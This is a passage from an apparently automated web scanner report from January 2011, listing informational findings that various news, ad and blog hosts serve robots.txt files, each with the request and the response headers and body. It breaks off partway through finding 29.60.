Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.23. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 30 Jan 2011 01:42:34 GMT
Server: Cookie Matcher
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

29.24. http://college.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://college.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: college.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://college.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:ef7"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:56 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.25. http://collegebasketball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://collegebasketball.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: collegebasketball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://collegebasketball.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:57 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.26. http://collegefootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://collegefootball.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: collegefootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://collegefootball.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:58 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.27. http://curmudgeons.blogspot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://curmudgeons.blogspot.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: curmudgeons.blogspot.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Sun, 30 Jan 2011 02:07:57 GMT
Date: Sun, 30 Jan 2011 02:07:57 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Sat, 29 Jan 2011 22:50:38 GMT
ETag: "3769e370-63c6-4a98-8a60-8feefd5f390b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search

Sitemap: http://curmudgeons.blogspot.com/feeds/posts/default?orderby=updated

29.28. http://dateline.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dateline.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dateline.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:04 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.29. http://developer.yahoo.net/yui/license.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.net
Path:   /yui/license.txt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: developer.yahoo.net

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 27 Sep 2010 22:34:40 GMT
Accept-Ranges: bytes
Content-Length: 29
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /mt/

29.30. http://digitalnature.ro/projects/fusion

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digitalnature.ro
Path:   /projects/fusion

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digitalnature.ro

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://digitalnature.ro/xmlrpc.php
Set-Cookie: wassup=MDBlY2ZhZTI0YWU0OGRjZTdmNzUwOTk5NDM4YmFlZGI6OjEyOTYzNTU5OTM6Ojo6MTczLjE5My4yMTQuMjQzOjoxNzMuMTkzLjIxNC4yNDMtc3RhdGljLnJldmVyc2Uuc29mdGxheWVyLmNvbQ%253D%253D; expires=Sun, 30-Jan-2011 02:58:13 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://digitalnature.ro/sitemap.xml.gz

29.31. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.macromedia.com
Path:   /pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Unix)
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "1c91-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 30 Jan 2011 02:08:11 GMT
Connection: close

User-agent: *
Disallow: /

29.32. http://earthsky.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://earthsky.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: earthsky.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sun, 30 Jan 2011 02:08:15 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-nollkmcj=17DA8352D5F6E5FDCD81AE17073E9E05; path=/
Last-Modified: Mon, 07 Jun 2010 16:58:46 GMT
Content-Length: 29

User-agent: *
Disallow: /wp-

29.33. http://ec.redcated/ds/UXULASONYSEL/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ec.redcated
Path:   /ds/UXULASONYSEL/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ec.redcated

Response

HTTP/1.0 200 OK
Expires: Sun, 06 Feb 2011 02:08:12 GMT
Date: Sun, 30 Jan 2011 02:08:12 GMT
Content-Type: text/plain
Content-Length: 68
Allow: GET
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

29.34. http://eurekalert.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eurekalert.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: eurekalert.org

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:15 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Last-Modified: Tue, 19 Oct 2010 16:23:28 GMT
ETag: "16a04-d8-4cbdc600"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

#
# robots.txt for http://www.eurekalert.org
#

# To prevent search engines from looking for docs in
# the "/releases" directory, which is no longer used
User-agent: *
Disallow: /releases
Disallow: /e
...[SNIP]...

29.35. http://hardball.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hardball.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hardball.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:22 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.36. http://helenaspopkin.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://helenaspopkin.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: helenaspopkin.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=11818041970a8df9502fdbab72b2013b; expires=Sat, 25-Jan-2031 02:07:19 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:07:19 GMT
Content-Length: 253
Keep-Alive: timeout=3, max=974
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://helena
...[SNIP]...

29.37. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ingame.msnbc.msn.com
Path:   /_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ingame.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 249
Content-Type: text/plain
Cache-Control: max-age=296
Expires: Sun, 30 Jan 2011 02:13:25 GMT
Date: Sun, 30 Jan 2011 02:08:29 GMT
Connection: close


User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://inga
...[SNIP]...

29.38. http://jcfootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jcfootball.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jcfootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://jcfootball.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:08 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.39. http://jp.video.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jp.video.redacted
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jp.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 116
Content-Type: text/plain
Last-Modified: Sun, 22 Jun 2008 10:45:44 GMT
Accept-Ranges: bytes
ETag: "0bc261f55d4c81:1713"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:08 GMT
Connection: close

User-agent: msnbot-media
Disallow:

User-agent: *
Disallow: /StreamingUrl.aspx?*
Disallow: /StreamingUrl.aspx

29.40. http://jquery.org/license

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /license

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jquery.org

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 02:09:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://jquery.org/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.41. http://latino.video.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://latino.video.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: latino.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 116
Content-Type: text/plain
Last-Modified: Sun, 22 Jun 2008 10:45:44 GMT
Accept-Ranges: bytes
ETag: "0bc261f55d4c81:1713"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:11 GMT
Connection: close

User-agent: msnbot-media
Disallow:

User-agent: *
Disallow: /StreamingUrl.aspx?*
Disallow: /StreamingUrl.aspx

29.42. http://live.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://live.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: live.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=d16c24a1312b877495181a6fc42c0a51; expires=Sat, 25-Jan-2031 02:08:24 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:08:24 GMT
Content-Length: 244
Keep-Alive: timeout=3, max=991
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://live.n
...[SNIP]...

29.43. http://login.live.com/gls.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.live.com
Path:   /gls.srf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.live.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Sat, 08 Jan 2011 07:07:42 GMT
Accept-Ranges: bytes
ETag: "073d7bd2afcb1:691"
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1M53 V: 0
Date: Sat, 29 Jan 2011 23:14:16 GMT
Connection: close

User-agent: *
Disallow:

29.44. http://malexj.tk/6M

Summary

Severity:   Information
Confidence:   Certain
Host:   http://malexj.tk
Path:   /6M

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: malexj.tk

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Resin/2.1.17
ETag: "AAAAS3M0Chw"
Last-Modified: Fri, 28 Jan 2011 13:29:10 GMT
Content-Type: text/plain
Content-Length: 67
Connection: close

# Robots.txt file for TK sites
#
User-agent: *
Disallow: /tikilink

29.45. http://malexj.wordpress.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://malexj.wordpress.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: malexj.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 02:09:34 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://malexj.wordpress.com/xmlrpc.php
Content-Length: 267
X-nc: HIT luv 46

Sitemap: http://malexj.wordpress.com/sitemap.xml

User-agent: IRLbot
Crawl-delay: 3600

User-agent: *
Disallow: /next/

# har har
User-agent: *
Disallow: /activate/

User-agent: *
Disallow: /signup/


...[SNIP]...

29.46. http://michaelwann.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://michaelwann.newsvine.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: michaelwann.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=8c2c07b5ad57597beb91d2a0dd79a825; expires=Sat, 25-Jan-2031 02:08:32 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:08:32 GMT
Content-Length: 251
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://michae
...[SNIP]...

29.47. http://mlb.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mlb.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mlb.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://mlb.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:e39"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:38 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.48. http://msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.49. http://mtp.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mtp.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mtp.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:52 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.50. http://music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.aol.com
Path:   /radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=UTF-8
Content-Length: 2176
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive

User-agent: *
Sitemap: http://music.aol.com/sitemap_static_urls.xml
Sitemap: http://music.aol.com/video_sitemap_index.xml
Sitemap: http://music.aol.com/artist_sitemap_index.xml
Sitemap: http://music.a
...[SNIP]...

29.51. http://nbcsports.msnbc.com/id/41325676/ns/sports-tennis/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /id/41325676/ns/sports-tennis/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nbcsports.msnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:265"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Content-Length: 151
Cache-Control: public, max-age=0
Expires: Sun, 30 Jan 2011 02:17:06 GMT
Date: Sun, 30 Jan 2011 02:17:06 GMT
Connection: close

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.52. http://netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netscape.aol.com
Path:   /$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netscape.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:13 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmb33.websys.aol.com
Content-Type: text/html;charset=UTF-8
Content-Length: 28
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive

User-agent: *
Disallow: /

29.53. http://news.discovery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.discovery.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.discovery.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Tue, 10 Nov 2009 15:43:39 GMT
ETag: "58b15-28-478062c86a0c0"
Accept-Ranges: bytes
Content-Length: 40
Content-Type: text/plain
Date: Sun, 30 Jan 2011 02:17:14 GMT
Connection: close

User-agent: *
Disallow: /ads/
Allow: /

29.54. http://news.sciencemag.org/scienceinsider/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.sciencemag.org
Path:   /scienceinsider/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.sciencemag.org

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.11 DAV/2
Last-Modified: Thu, 11 Feb 2010 21:13:36 GMT
ETag: "2f1e-13b-47f599fc2c000"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: text/plain

User-agent: *
crawl-delay: 5
Disallow: /css
Disallow: /js
Disallow: /mt-static
Disallow: /cgi-bin

Sitemap: http://news.sciencemag.org/sitemap.xml

User-agent: Fasterfox
Disallow:/

User-agent: daumo
...[SNIP]...

29.55. http://nightly.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nightly.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nightly.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:18 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.56. http://ninemsn.video.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ninemsn.video.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ninemsn.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 116
Content-Type: text/plain
Last-Modified: Sun, 22 Jun 2008 10:45:44 GMT
Accept-Ranges: bytes
ETag: "0bc261f55d4c81:1713"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:20 GMT
Connection: close

User-agent: msnbot-media
Disallow:

User-agent: *
Disallow: /StreamingUrl.aspx?*
Disallow: /StreamingUrl.aspx

29.57. http://openchannel.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://openchannel.msnbc.redacted
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: openchannel.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 252
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 02:22:31 GMT
Date: Sun, 30 Jan 2011 02:17:31 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://opench
...[SNIP]...

29.58. http://p.ace.advertising.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.ace.advertising.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:17:39 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

29.59. http://pagead2.googlesyndication.com/pagead/expansion_embed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/expansion_embed.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 30 Jan 2011 01:24:30 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

29.60. http://planetary.org/blog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://planetary.org
Path:   /blog

Issue detail

